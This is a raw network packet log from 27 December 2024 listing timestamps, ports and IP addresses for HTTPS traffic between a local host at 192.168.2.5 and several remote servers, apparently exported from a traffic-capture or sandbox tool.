Dec 27, 2024 07:10:41.522841930 CET	443	49974	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:41.523267984 CET	49974	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:41.523267984 CET	49974	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:41.523360968 CET	443	49974	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:41.541002989 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.541083097 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.541102886 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.550187111 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.550224066 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.550266981 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.550275087 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.550332069 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.556207895 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.562817097 CET	49974	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:41.563757896 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.563860893 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.563868046 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.576081991 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.576132059 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.576141119 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.579457998 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.579535961 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.579541922 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.592432976 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.592516899 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.592523098 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.606405973 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.606486082 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.606492043 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.620193005 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.620312929 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.620320082 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.632126093 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.632193089 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.632199049 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.646050930 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.646142960 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.646150112 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.657655001 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.657793999 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.657800913 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.669536114 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.669615984 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.669624090 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.681314945 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.681411028 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.681417942 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.708931923 CET	443	49973	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:41.709012032 CET	443	49973	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:41.709094048 CET	49973	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:41.709777117 CET	49973	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:41.709790945 CET	443	49973	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:41.710680008 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.710799932 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.710808039 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.713073969 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.713161945 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.713169098 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.747766018 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.747838020 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.747847080 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.749931097 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.750288963 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.750294924 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.754251003 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.754317999 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.754323959 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.758452892 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.758531094 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.758538008 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.762697935 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.764117002 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.764125109 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.770366907 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.771429062 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.771437883 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.771832943 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.774770975 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.774777889 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.776240110 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.778032064 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.778038025 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.783338070 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.783811092 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.783818007 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.790911913 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.791022062 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.791028976 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.799921036 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.799992085 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.799999952 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.806026936 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.806104898 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.806111097 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.828125000 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.828181028 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.828187943 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.829812050 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.829999924 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.830008030 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.832313061 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.832393885 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.832401037 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.836298943 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.837203979 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.837212086 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.843847990 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.843935966 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.843944073 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.854412079 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.859832048 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.859842062 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.865968943 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.866158009 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.866164923 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.878612995 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.878653049 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.881223917 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.881400108 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.881411076 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.889642000 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.890202045 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.890214920 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.891581059 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.891709089 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.891716957 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.919038057 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.919157028 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.919162989 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.919809103 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.920101881 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.920109034 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.924741983 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.924815893 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.924823046 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.926673889 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.926759958 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.926762104 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.926772118 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.926841021 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.933903933 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.958262920 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.958354950 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.958616972 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.958625078 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.959121943 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.959223032 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.961292028 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.961385965 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.961393118 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.963169098 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.965111017 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.965197086 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.965270996 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.974395037 CET	443	49974	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:41.974550009 CET	443	49974	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:41.974812984 CET	49974	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.046619892 CET	443	49978	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.081721067 CET	49974	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.081737041 CET	443	49974	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.082292080 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:42.082314014 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:42.087145090 CET	49978	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.087169886 CET	443	49978	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.088754892 CET	443	49978	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.088821888 CET	49978	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.101892948 CET	49978	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.102000952 CET	443	49978	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.112689018 CET	443	49979	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.128961086 CET	49979	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.128992081 CET	443	49979	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.129460096 CET	443	49979	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.130647898 CET	49979	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.130731106 CET	443	49979	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.143307924 CET	49978	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.143322945 CET	443	49978	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.156089067 CET	49984	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:42.156126976 CET	443	49984	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:42.156254053 CET	49984	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:42.157552958 CET	49984	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:42.157566071 CET	443	49984	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:42.173855066 CET	49979	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.189213991 CET	49978	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.633754969 CET	443	49980	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.634116888 CET	49980	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.634151936 CET	443	49980	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.634479046 CET	443	49980	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.634869099 CET	49980	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.634939909 CET	443	49980	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.679214954 CET	443	49981	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.680457115 CET	49981	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.680471897 CET	443	49981	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.681485891 CET	443	49981	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.681566000 CET	49981	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.681931019 CET	49981	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.681982040 CET	443	49981	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.688373089 CET	49980	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.733685970 CET	49981	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.733694077 CET	443	49981	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.751367092 CET	49703	443	192.168.2.5	23.1.237.91
Dec 27, 2024 07:10:42.783735991 CET	49981	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:43.360665083 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:43.360722065 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:43.360732079 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:43.360764027 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:43.363045931 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:43.363061905 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:43.835073948 CET	443	49984	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:43.835388899 CET	49984	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:43.839833021 CET	49984	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:43.839839935 CET	443	49984	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:43.841552973 CET	49984	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:43.841559887 CET	443	49984	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:43.841604948 CET	49984	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:43.841624022 CET	443	49984	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:43.841636896 CET	49984	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:43.841644049 CET	443	49984	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:43.841697931 CET	49984	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:43.841715097 CET	443	49984	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:43.841736078 CET	49984	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:43.841746092 CET	443	49984	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:43.841846943 CET	49984	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:43.841859102 CET	443	49984	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:44.215812922 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:44.215868950 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:44.216085911 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:44.216466904 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:44.216480017 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:44.818665981 CET	49997	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:44.818707943 CET	443	49997	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:44.818872929 CET	49997	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:44.819094896 CET	49998	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:44.819147110 CET	443	49998	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:44.819206953 CET	49998	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:44.822113037 CET	49997	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:44.822141886 CET	443	49997	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:44.822187901 CET	49998	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:44.822221041 CET	443	49998	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.457381964 CET	443	49984	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.457444906 CET	49984	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.457456112 CET	443	49984	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.457473993 CET	443	49984	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.457503080 CET	49984	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.457529068 CET	49984	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.458569050 CET	49984	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.458579063 CET	443	49984	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.660908937 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.660984039 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.661459923 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.661468029 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.663577080 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.663583040 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.663686991 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.663705111 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.663778067 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.663783073 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.663820982 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.663832903 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.663914919 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.663927078 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.663958073 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.664005995 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.664047956 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.664067984 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.664083004 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.664088011 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.664103031 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.664117098 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.664180994 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.664194107 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.664244890 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.664254904 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.664304018 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.664315939 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.664352894 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.664361000 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.664442062 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.664455891 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.664488077 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.664498091 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.664666891 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.664675951 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.664694071 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.664707899 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.664722919 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.664731026 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.664745092 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.664751053 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:45.664757013 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:45.664761066 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:46.082861900 CET	443	49998	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.083075047 CET	49998	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.083093882 CET	443	49998	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.083436012 CET	443	49998	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.083765984 CET	49998	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.083834887 CET	443	49998	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.126308918 CET	49998	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.127276897 CET	443	49997	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.127509117 CET	49997	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.127521992 CET	443	49997	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.127866030 CET	443	49997	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.128308058 CET	49997	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.128374100 CET	443	49997	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.172472000 CET	49997	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.400577068 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:46.400615931 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:46.400794029 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:46.401494980 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:46.401508093 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:46.847556114 CET	49966	443	192.168.2.5	18.165.220.106
Dec 27, 2024 07:10:46.895330906 CET	443	49966	18.165.220.106	192.168.2.5
Dec 27, 2024 07:10:47.130232096 CET	50016	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:47.130270004 CET	443	50016	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:47.130342007 CET	50016	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:47.130507946 CET	50016	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:47.130527020 CET	443	50016	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:47.431267977 CET	443	49966	18.165.220.106	192.168.2.5
Dec 27, 2024 07:10:47.431397915 CET	443	49966	18.165.220.106	192.168.2.5
Dec 27, 2024 07:10:47.431521893 CET	49966	443	192.168.2.5	18.165.220.106
Dec 27, 2024 07:10:47.433121920 CET	49966	443	192.168.2.5	18.165.220.106
Dec 27, 2024 07:10:47.433135986 CET	443	49966	18.165.220.106	192.168.2.5
Dec 27, 2024 07:10:47.563503981 CET	49703	443	192.168.2.5	23.1.237.91
Dec 27, 2024 07:10:47.744165897 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.744230032 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.744245052 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.744260073 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.744296074 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.744323015 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.745246887 CET	49994	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.745261908 CET	443	49994	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.773843050 CET	50028	443	192.168.2.5	108.139.47.108
Dec 27, 2024 07:10:47.773868084 CET	443	50028	108.139.47.108	192.168.2.5
Dec 27, 2024 07:10:47.773930073 CET	50028	443	192.168.2.5	108.139.47.108
Dec 27, 2024 07:10:47.774111986 CET	50028	443	192.168.2.5	108.139.47.108
Dec 27, 2024 07:10:47.774123907 CET	443	50028	108.139.47.108	192.168.2.5
Dec 27, 2024 07:10:47.845906019 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.846002102 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.846458912 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.846488953 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.848457098 CET	50012	443	192.168.2.5	188.245.216.205
